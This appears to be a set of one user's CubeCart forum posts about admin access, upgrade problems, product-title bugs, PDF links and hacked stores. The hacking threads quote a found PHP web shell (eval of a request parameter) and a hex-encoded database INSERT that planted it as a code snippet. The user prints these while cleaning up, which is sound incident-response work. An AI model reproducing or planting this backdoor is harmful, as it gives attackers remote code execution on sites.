[Store Closed to Admin]

I've deleted the system files and re-upped them, cleared all the caches. I been trying to find out how the store closed is over ridden by the admin session but so far drawn a blank.

I thought I had some legacy support credits but it look like they have been wiped. So am stuck as the site is in development and the admins cannot see the store without making it live.

[Store Closed to Admin]

I'm using 6.12 and clicking the admin => storefront link - all my other sites are behaving as they should. I think there used to be a switch in the settings => offline page but it's no longer there

[Store Closed to Admin]

Logged in to Admin but get the store closed page?

Can't see any settings what am I missing?

[Ver 6.1.8 causes issues with some product titles]

I just upgraded my sites to ver 6.1.8 mainly to fix the product titles with double quotes bug e.g. 6" length
which was breaking the product image title code in the listing so no image was displayed.

<img src="image.jpg" title=" product="" title"="" >

The upgrade fixes the bug but causes another issue i.e. any product title previously added with double quotes breaks in the product admin page. 
e.g. 12" widget  
displays as 12 
Doesn't affect the store front listing

As I have hundreds of products across various sites like this I was wondering if anyone can think of a quick way to fix this issue otherwise I will have to manually re-enter every similar product.

Apostrophe character escaped in product names, emails bug

 

 

[Upgrade 6.1.0 to 6.1.5]

Just tried to install the 6.1.7 but the same installation problem remains - I thought this upgrade was supposed to cure it!

Install just hangs at 80% complete
"Upgrade in progress. Upgrading from version 6.0.12 to version 6.1.0"

Has anyone found the answer to this issue yet?

 

[Upgrade 6.1.0 to 6.1.5]

I did a manual upgrade and copied all the new files but the setup still sticks at 80% even if I click the continue button. Seems to get stuck upgrading from 6.0.12 to 6.1.0

Edited to add just checked the history table seems I upgraded to 6.1.0 last October so can't understand why CC is trying to upgrade from 6.0.12 to 6.1.0 if it's already 6.1.0
 

CubeCart Version	Date
6.1.0	Wednesday, 26 October 2016
6.1.0	Wednesday, 26 October 2016
6.0.12	Monday, 17 October 2016
6.0.12	Wednesday, 26 October 2016

I tried Force Upgrade which says upgraded to latest version now

Upgrade in progress. Upgrading from version 6.0.12 to version 6.1.0

 

[Upgrade 6.1.0 to 6.1.5]

Neither of these suggestions work - still stuck at 80%. 

all files are writable
 

PHP 5.4+

5.5.49MySQL 5.5+

InstalledGD Image Library

InstalledSimple XML Parser

InstalledcURL

InstalledZip (ZipArchive)

[Upgrade 6.1.0 to 6.1.5]

Same here
Tried a hard update (i.e.replace all files and run setup) but setup get's into a loop 
Upgrade in progress. Upgrading from version 6.0.12 to version 6.1.0
bar shows 80% but doesn't complete the installation

[Upgrade issue]

There's no error logs so maybe I just need to edit the admin updates

[Upgrade issue]

OK thanks Al I will manually upgrade to make sure all files are up to date

 

[Upgrade issue]

1 minute ago, Al Brookbanks said:

The auto upgrade may skip renaming the admin.php and admin folder. 
You can rename the admin folder and admin.php file (keeping .php on the end) manually then edit the includes/global.inc.php file to reflect the changes. 

Do you still have the smarty error? If so please try deleting all files in the /cache folder. 

I only got that error when I used the auto update.
When I used force update I received no errors but am wondering if the upgrade only updated some files.
Should I try a manual upgrade?

 

1 minute ago, Al Brookbanks said:

The auto upgrade may skip renaming the admin.php and admin folder. 
You can rename the admin folder and admin.php file (keeping .php on the end) manually then edit the includes/global.inc.php file to reflect the changes. 

Do you still have the smarty error? If so please try deleting all files in the /cache folder. 

I only got that error when I used the auto update.
When I used force update I received no errors but am wondering if the upgrade only updated some files.
Should I try a manual upgrade?

 

[Upgrade issue]

HI

I'm currently developing a new Cubecart site, started last week by installing CC version 6.0.12 

Tried to upgrade to latest version 6.1.0 using admin upgrade and got this
[Exception] /var/www/XXXXX/XXXX/XXXXX/web/includes/lib/smarty/sysplugins/smarty_internal_undefined.php:47 - Smarty_Internal_Template->_decodeProperties() undefined method

and the home page using foundation skin now has massive system images.

EDITED TO ADD
1/  fixed large images by clearing browser cache.
2/ used force upgrade and the system says it's version 6.1.0 but the admin is still /admin.php
 

Any ideas what to do next?

[Add product datasheet]

 

!

[Add product datasheet]

Yes thanks I used the downloads system to upload the pdf then just copied the url into the link in the product description. Then just changed the .htacess file protecting the downloads folder. Easy enough for me but the client will require something less cluncky

Senior moment! 
Just remembered this will do until I find a more client-friendly mod

 

[Add product datasheet]

Are there any mods available to add product datasheets (pdf) with admin function

[PHP Version]

1 minute ago, Al Brookbanks said:

It will work fine. 

OK thanks for that Al 

 

[PHP Version]

My server runs PHP 5.4.45 so does that mean the latest CC upgrade won't install or won't work after it installs?

[[Resolved] Linking to PDF Files]

In Version 6.0.11

Thanks bsmither - Works for me!

In the file /includes/ckeditor/config.js:
Around line: 8

Add after  config.filebrowserBrowseUrl = document.location.pathname+'?_g=filemanager&mode=fck';
                 config.filebrowserBrowseUrl = document.location.pathname+'?_g=filemanager&mode=fck_digital';

Then as above

In the file /admin/sources/filemanager.index.inc.php:
Find near line 28:
 case 'digital':
  $mode = FileManager::FM_FILETYPE_DL;
  break;

On a new blank line ABOVE that, add:
 case 'fck_digital':
  $GLOBALS['main']->hideNavigation(true);
  $select_button = true;

[Malicious file found]

The store (5.2.16)was patched on September 7th  and upgraded to 6.0.8 on December 9 shortly before the attack - spotted on December 18. I upgraded all other sites at same time so would have checked for malicious folders, files and snippets in includes/extra (can't remember if I checked the table though).

It's a dedicated webserver so I'll see if I can find out when the file adminer.php was uploaded and the code snippet added to the table. I can see from the Cubecart staff access logs there are two successful admin logins recorded with no admin username and dodgy IP numbers.

Dec 14 2015, 22:41 PM 93.115.95.216
Nov 28 2015, 04:12 AM 142.4.213.25
All other login IP's check out OK

It looks like access was made without a username on December 14. & November 28. Was it possible to do this using the original security issue?

Is there anything else I should check?

 

[Malicious file found]

Hi bsmither
Thanks for your reply. I did remove the snippet from the table as well and I checked all of my CC sites today to make sure there's nothing malicious. Although three of them were affected earlier this month, this particular site hasn't been attacked before. I added the admin fix last September when the security alert was posted and I have now upgraded each site to 6.0.8.

Just left wondering how these snippets and files get uploaded?

[Malicious file found]

I just had similar with Cubecart 6.0.8
Since the previous attack I regularly check all Cubecart sites (all 6.0.8) and today I found a code snippet in the hooks I went through all the files and removed anything that was either not supposed to be there or redundant. Checking the staff logs I spotted this entry but no username.

Dec 14 2015, 22:41 PM 93.115.95.216 Y

edited to add this site was not previously attacked

I found this file in the root
 

adminer.php

[Hacked sites]

Hi

All four of my websites that use Cube Cart were hacked this week and crap files and folders with advertising stuff uploaded to the root.

I was using version 5.2.16 but have now upgraded all to 6.0.8

The server is set up with SuExec so no folders are writable from outside the server so I'm not sure how they got in. I am suspecting cKeditor but that's just a guess.
It would be very useful to know were the vulnerability was/is. Has anyone else experienced this?

Found previous post on subject - removed code snippets!

Update: Just checked my files and the sites affected had the security patch added admin.class.php

[Cross site contamination???]

Hi bsmither

Sorry I've been away for a few days
So far no more link problems - since I deleted the snippet file BTW I exported it from the DB before I deleted it here's the sql
INSERT INTO `CubeCart_code_snippet` (`snippet_id`, `enabled`, `unique_id`, `description`, `hook_trigger`, `php_code`, `version`, `author`, `priority`) VALUES
(1, 1, 'snippet8GsxU', 'Snippet', 'controller.index', 0x3c3f706870206576616c28245f524551554553545b223847737855225d293b3f3e, '', '', 3);
 

Thanks for your help with this issue

[Cross site contamination???]

Thanks again for your suggestions

I managed to read the BLOB it was same as file content
<?php eval($_REQUEST["8GsxU"]);?>

I searched all tables but didn't find any reference to 8GsxU
so I deleted the record - it wasn't there in the sql file migrated from the old server the folders are all set to rxwr-xr-x because I am using suExec so don't know how that file arrived in that folder.
I have deleted all site files except images and /includes/global.inc.php and re-upped from a clean version 5.2.16

Just have to see if it happens again

 

[Cross site contamination???]

Asked for logs but also found this file
/includes/extra/snippet_0777be0bd41002b59fc2f777d9c7d77e.php  
created14/05/2015
contains just one line
<?php eval($_REQUEST["8GsxU"]);?>

looks a bit suspicious to me